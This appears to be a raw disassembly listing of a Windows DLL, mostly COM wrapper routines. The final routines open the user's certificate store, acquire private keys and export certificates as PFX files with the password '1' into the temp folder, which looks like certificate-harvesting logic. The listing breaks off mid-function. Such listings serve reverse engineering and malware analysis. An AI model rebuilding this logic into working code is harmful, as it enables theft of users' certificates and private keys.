lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_C]
mov edx, [ecx]
mov eax, [ebp+var_C]
push eax
call dword ptr [edx+20h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DD14
push offset dword_10023388
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DD14: ; CODE XREF: sub_1000DCE0+20�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_1000DCE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DD20 proc near ; CODE XREF: sub_10003786+CA2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_C]
mov edx, [ecx]
mov eax, [ebp+var_C]
push eax
call dword ptr [edx+28h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DD54
push offset dword_10023388
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DD54: ; CODE XREF: sub_1000DD20+20�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_1000DD20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DD60 proc near ; CODE XREF: sub_10003786+CBA�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_C]
mov edx, [ecx]
mov eax, [ebp+var_C]
push eax
call dword ptr [edx+30h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DD94
push offset dword_10023388
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DD94: ; CODE XREF: sub_1000DD60+20�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_1000DD60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DDA0 proc near ; CODE XREF: sub_10003786+CD2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_C]
mov edx, [ecx]
mov eax, [ebp+var_C]
push eax
call dword ptr [edx+38h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DDD4
push offset dword_10023388
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DDD4: ; CODE XREF: sub_1000DDA0+20�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_1000DDA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DDE0 proc near ; CODE XREF: sub_10003786+2C0�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov [ebp+var_30], ecx
mov [ebp+var_2C], 0
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov [ebp+var_18], edx
mov eax, [ecx+4]
mov [ebp+var_14], eax
mov edx, [ecx+8]
mov [ebp+var_10], edx
mov eax, [ecx+0Ch]
mov [ebp+var_C], eax
sub esp, 10h
mov ecx, esp
mov edx, [ebp+var_18]
mov [ecx], edx
mov eax, [ebp+var_14]
mov [ecx+4], eax
mov edx, [ebp+var_10]
mov [ecx+8], edx
mov eax, [ebp+var_C]
mov [ecx+0Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx]
mov [ebp+var_28], edx
mov eax, [ecx+4]
mov [ebp+var_24], eax
mov edx, [ecx+8]
mov [ebp+var_20], edx
mov eax, [ecx+0Ch]
mov [ebp+var_1C], eax
sub esp, 10h
mov ecx, esp
mov edx, [ebp+var_28]
mov [ecx], edx
mov eax, [ebp+var_24]
mov [ecx+4], eax
mov edx, [ebp+var_20]
mov [ecx+8], edx
mov eax, [ebp+var_1C]
mov [ecx+0Ch], eax
mov ecx, [ebp+var_30]
mov edx, [ecx]
mov eax, [ebp+var_30]
push eax
call dword ptr [edx+2Ch]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DE87
push offset dword_10023398
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DE87: ; CODE XREF: sub_1000DDE0+93�j
push 0
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_0]
call sub_1000E240
mov ecx, [ebp+var_2C]
or ecx, 1
mov [ebp+var_2C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 0Ch
sub_1000DDE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DEB0 proc near ; CODE XREF: sub_10003786+C55�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+0B0h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DEEE
push offset dword_100233A8
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DEEE: ; CODE XREF: sub_1000DEB0+2A�j
push 0
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_0]
call sub_1000E240
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_1000DEB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DF10 proc near ; CODE XREF: sub_10003786+4AB�p
; sub_10003786+4F9�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
psz = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+psz]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+20h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DF4B
push offset dword_100233B8
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DF4B: ; CODE XREF: sub_1000DF10+27�j
push 0 ; char
mov eax, [ebp+psz]
push eax ; psz
mov ecx, [ebp+arg_0]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z_0 ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_1000DF10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DF70 proc near ; CODE XREF: sub_10003786+7AC�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
psz = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+psz]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+28h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000DFAB
push offset dword_100233B8
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000DFAB: ; CODE XREF: sub_1000DF70+27�j
push 0 ; char
mov eax, [ebp+psz]
push eax ; psz
mov ecx, [ebp+arg_0]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z_0 ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_1000DF70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000DFD0 proc near ; CODE XREF: sub_10003786+7C9�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
psz = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+psz]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+30h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000E00B
push offset dword_100233B8
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000E00B: ; CODE XREF: sub_1000DFD0+27�j
push 0 ; char
mov eax, [ebp+psz]
push eax ; psz
mov ecx, [ebp+arg_0]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z_0 ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_1000DFD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E030 proc near ; CODE XREF: sub_10003786+7E6�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
psz = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+psz]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+0B4h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000E06E
push offset dword_100233B8
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000E06E: ; CODE XREF: sub_1000E030+2A�j
push 0 ; char
mov eax, [ebp+psz]
push eax ; psz
mov ecx, [ebp+arg_0]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z_0 ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_1000E030 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E090 proc near ; CODE XREF: sub_10003786+803�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
psz = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+psz]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+0BCh]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000E0CE
push offset dword_100233B8
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000E0CE: ; CODE XREF: sub_1000E090+2A�j
push 0 ; char
mov eax, [ebp+psz]
push eax ; psz
mov ecx, [ebp+arg_0]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z_0 ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_1000E090 endp
; ---------------------------------------------------------------------------
align 10h
; [00000010 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E100 proc near ; CODE XREF: sub_10001089+A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
cmp [ebp+arg_0], 0
jz short loc_1000E120
push 80004003h
call sub_1001C8F0
loc_1000E120: ; CODE XREF: sub_1000E100+14�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_1000E100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E130 proc near ; CODE XREF: sub_100020B5+405�p
; sub_100020B5+425�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_1000E149
push 80004003h
call sub_1001C8F0
loc_1000E149: ; CODE XREF: sub_1000E130+D�j
mov ecx, [ebp+var_4]
mov eax, [ecx]
mov esp, ebp
pop ebp
retn
sub_1000E130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E160 proc near ; CODE XREF: sub_100034DC+9�p
; sub_10003541+4C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
xor ecx, ecx
cmp dword ptr [eax], 0
setnz cl
mov al, cl
mov esp, ebp
pop ebp
retn
sub_1000E160 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E180 proc near ; CODE XREF: sub_10003645+104�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
cmp [ebp+arg_0], 0
jz short loc_1000E197
push 80004003h
call sub_1001C8F0
loc_1000E197: ; CODE XREF: sub_1000E180+B�j
mov eax, [ebp+var_4]
xor ecx, ecx
cmp dword ptr [eax], 0
setz cl
mov al, cl
mov esp, ebp
pop ebp
retn 4
sub_1000E180 endp
; ---------------------------------------------------------------------------
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION std::_Container_base::_Container_base(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E1D0 proc near ; CODE XREF: sub_100010AC+8�p
; sub_100020B5+639�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000E290
mov esp, ebp
pop ebp
retn
sub_1000E1D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E1F0 proc near ; CODE XREF: sub_100020B5+3CE�p
; sub_100020B5+3F5�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000E290
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_1000E1F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E210 proc near ; CODE XREF: sub_100034DC+37�p
; sub_10003541+7A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
cmp [ebp+arg_0], 0
jz short loc_1000E227
push 80004003h
call sub_1001C8F0
loc_1000E227: ; CODE XREF: sub_1000E210+B�j
push 0
mov ecx, [ebp+var_4]
call sub_1000E2C0
mov esp, ebp
pop ebp
retn 4
sub_1000E210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E240 proc near ; CODE XREF: sub_1000DDE0+B0�p
; sub_1000DEB0+47�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+arg_4]
and edx, 0FFh
test edx, edx
jz short loc_1000E264
mov ecx, [ebp+var_4]
call sub_1000E310
loc_1000E264: ; CODE XREF: sub_1000E240+1A�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_1000E240 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E270 proc near ; CODE XREF: sub_10003786+C6D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov ecx, [ebp+var_4]
call sub_1000E2C0
mov esp, ebp
pop ebp
retn 4
sub_1000E270 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E290 proc near ; CODE XREF: sub_1000E1D0+A�p
; sub_1000E1F0+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_1000E2AF
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+var_4]
mov ecx, [eax]
mov eax, [ecx]
push edx
call dword ptr [eax+8]
loc_1000E2AF: ; CODE XREF: sub_1000E290+D�j
mov esp, ebp
pop ebp
retn
sub_1000E290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E2C0 proc near ; CODE XREF: sub_1000E210+1C�p
; sub_1000E270+10�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [eax]
cmp ecx, [ebp+arg_0]
jz short loc_1000E2FD
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_8]
call sub_1000E310
cmp [ebp+var_4], 0
jz short loc_1000E2FD
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
push edx
call dword ptr [ecx+8]
loc_1000E2FD: ; CODE XREF: sub_1000E2C0+11�j
; sub_1000E2C0+2F�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 4
sub_1000E2C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E310 proc near ; CODE XREF: sub_1000E240+1F�p
; sub_1000E2C0+26�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_1000E32F
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+var_4]
mov ecx, [eax]
mov eax, [ecx]
push edx
call dword ptr [eax+4]
loc_1000E32F: ; CODE XREF: sub_1000E310+D�j
mov esp, ebp
pop ebp
retn
sub_1000E310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E340 proc near ; CODE XREF: sub_10003786+345�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
push offset dword_10023378
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov eax, [ebp+arg_0]
push eax
call dword ptr [edx]
pop ebp
retn 8
sub_1000E340 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E360 proc near ; CODE XREF: sub_10003786+3E7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
push offset dword_100233B8
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov eax, [ebp+arg_0]
push eax
call dword ptr [edx]
pop ebp
retn 8
sub_1000E360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000E380 proc near ; CODE XREF: sub_10003786+6EB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
push offset dword_100233A8
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov eax, [ebp+arg_0]
push eax
call dword ptr [edx]
pop ebp
retn 8
sub_1000E380 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 10h
mov dword ptr [ebp-10h], 0
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-4], 0
mov dword ptr [ebp-0Ch], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call ds:CreateFileA ; CreateFileA
mov [ebp-10h], eax
lea ecx, [ebp-0Ch]
push ecx
mov edx, [ebp-10h]
push edx
call ds:GetFileSize ; GetFileSize
mov [ebp-4], eax
mov eax, [ebp-4]
push eax
call ds:CryptMemAlloc
mov ecx, [ebp+0Ch]
mov [ecx+4], eax
mov edx, [ebp+0Ch]
mov eax, [ebp-4]
mov [edx], eax
push 0
lea ecx, [ebp-8]
push ecx
mov edx, [ebp+0Ch]
mov eax, [edx]
push eax
mov ecx, [ebp+0Ch]
mov edx, [ecx+4]
push edx
mov eax, [ebp-10h]
push eax
call ds:ReadFile ; ReadFile
mov ecx, [ebp-10h]
push ecx
call ds:CloseHandle ; CloseHandle
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
mov dword ptr [ebp-0Ch], 0
mov dword ptr [ebp-10h], 0
mov dword ptr [ebp-4], 2
mov dword ptr [ebp-8], 1
push 1
mov eax, [ebp+10h]
push eax
lea ecx, [ebp+8]
push ecx
call ds:PFXImportCertStore
mov [ebp-0Ch], eax
push 0
mov edx, [ebp-0Ch]
push edx
call ds:CertEnumCertificatesInStore
mov [ebp-10h], eax
lea eax, [ebp-8]
push eax
lea ecx, [ebp-4]
push ecx
mov edx, [ebp+14h]
push edx
push 0
push 0
mov eax, [ebp-10h]
push eax
call ds:CryptAcquireCertificatePrivateKey
push 1
mov ecx, [ebp-0Ch]
push ecx
call ds:CertCloseStore
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-4], 0
push 0
lea eax, [ebp-8]
push eax
push 0
push 6
mov ecx, [ebp+8]
push ecx
call ds:CryptGetProvParam ; CryptGetProvParam
mov edx, [ebp-8]
push edx
call ds:CryptMemAlloc
mov [ebp-4], eax
push 0
lea eax, [ebp-8]
push eax
mov ecx, [ebp-4]
push ecx
push 6
mov edx, [ebp+8]
push edx
call ds:CryptGetProvParam ; CryptGetProvParam
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 20h
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-14h], 0
push 0
lea eax, [ebp-1Ch]
push eax
push 0
push 0
push 2
mov ecx, [ebp+0Ch]
push ecx
push 10001h
call ds:CertStrToNameA
mov edx, [ebp-1Ch]
push edx
call ds:CryptMemAlloc
mov [ebp-18h], eax
push 0
lea eax, [ebp-1Ch]
push eax
mov ecx, [ebp-18h]
push ecx
push 0
push 2
mov edx, [ebp+0Ch]
push edx
push 10001h
call ds:CertStrToNameA
lea eax, [ebp-10h]
push eax
call ds:GetSystemTime ; GetSystemTime
mov cx, [ebp-10h]
add cx, 5
mov [ebp-10h], cx
push 0
lea edx, [ebp-10h]
push edx
push 0
push 0
push 0
push 0
lea eax, [ebp-1Ch]
push eax
mov ecx, [ebp+8]
push ecx
call ds:CertCreateSelfSignCertificate
mov [ebp-20h], eax
push 0
push 2000h
push 0
push 0
push 2
call ds:CertOpenStore
mov [ebp-14h], eax
push 0
push 1
mov edx, [ebp-20h]
push edx
mov eax, [ebp-14h]
push eax
call ds:CertAddCertificateContextToStore
push 4
push 0
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+14h]
push edx
mov eax, [ebp-14h]
push eax
call ds:PFXExportCertStoreEx
mov ecx, [ebp+14h]
mov edx, [ecx]
push edx
call ds:CryptMemAlloc
mov ecx, [ebp+14h]
mov [ecx+4], eax
push 4
push 0
mov edx, [ebp+10h]
push edx
mov eax, [ebp+14h]
push eax
mov ecx, [ebp-14h]
push ecx
call ds:PFXExportCertStoreEx
mov edx, [ebp-18h]
push edx
call ds:CryptMemFree
push 1
mov eax, [ebp-14h]
push eax
call ds:CertCloseStore
mov ecx, [ebp-20h]
push ecx
call ds:CertFreeCertificateContext
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000E615(DWORD nNumberOfBytesToWrite, LPCVOID lpBuffer, LPCSTR lpFileName)
sub_1000E615 proc near ; CODE XREF: sub_1000E66B+1E9�p
NumberOfBytesWritten= dword ptr -8
hObject = dword ptr -4
nNumberOfBytesToWrite= dword ptr 8
lpBuffer = dword ptr 0Ch
lpFileName = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+hObject], 0
mov [ebp+NumberOfBytesWritten], 0
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
mov eax, [ebp+lpFileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 0 ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
mov edx, [ebp+nNumberOfBytesToWrite]
push edx ; nNumberOfBytesToWrite
mov eax, [ebp+lpBuffer]
push eax ; lpBuffer
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:WriteFile ; WriteFile
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
mov esp, ebp
pop ebp
retn
sub_1000E615 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000E66B(void *pvPara)
sub_1000E66B proc near ; CODE XREF: sub_1000A318+6B3�p
; sub_1000B7EF+AC9�p
hCertStore = dword ptr -318h
pCertContext = dword ptr -314h
szPassword = dword ptr -310h
String2 = byte ptr -30Ch
var_30B = byte ptr -30Bh
pszNameString = byte ptr -20Ch
var_20B = byte ptr -20Bh
hStore = dword ptr -10Ch
FileName = byte ptr -108h
var_107 = byte ptr -107h
Dst = dword ptr -8
lpBuffer = dword ptr -4
pvPara = dword ptr 8
push ebp
mov ebp, esp
sub esp, 318h
push edi
mov [ebp+hCertStore], 0
mov [ebp+hStore], 0
mov [ebp+pCertContext], 0
mov [ebp+pszNameString], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_20B]
rep stosd
stosw
stosb
mov [ebp+FileName], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosw
stosb
mov [ebp+String2], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_30B]
rep stosd
stosw
mov [ebp+szPassword], offset a1_3 ; "1"
push 8 ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
lea ecx, [ebp+String2]
push ecx ; lpBuffer
push 0FFh ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
mov edx, [ebp+pvPara]
push edx ; pvPara
push 10000h ; dwFlags
push 0 ; hCryptProv
push 0 ; dwEncodingType
push 0Ah ; lpszStoreProvider
call ds:CertOpenStore
mov [ebp+hCertStore], eax
cmp [ebp+hCertStore], 0
jnz short loc_1000E732
jmp loc_1000E861
; ---------------------------------------------------------------------------
loc_1000E732: ; CODE XREF: sub_1000E66B+C0�j
; sub_1000E66B:loc_1000E85C�j
mov eax, [ebp+pCertContext]
push eax ; pPrevCertContext
mov ecx, [ebp+hCertStore]
push ecx ; hCertStore
call ds:CertEnumCertificatesInStore
mov [ebp+pCertContext], eax
cmp [ebp+pCertContext], 0
jz loc_1000E861
push 80h ; cchNameString
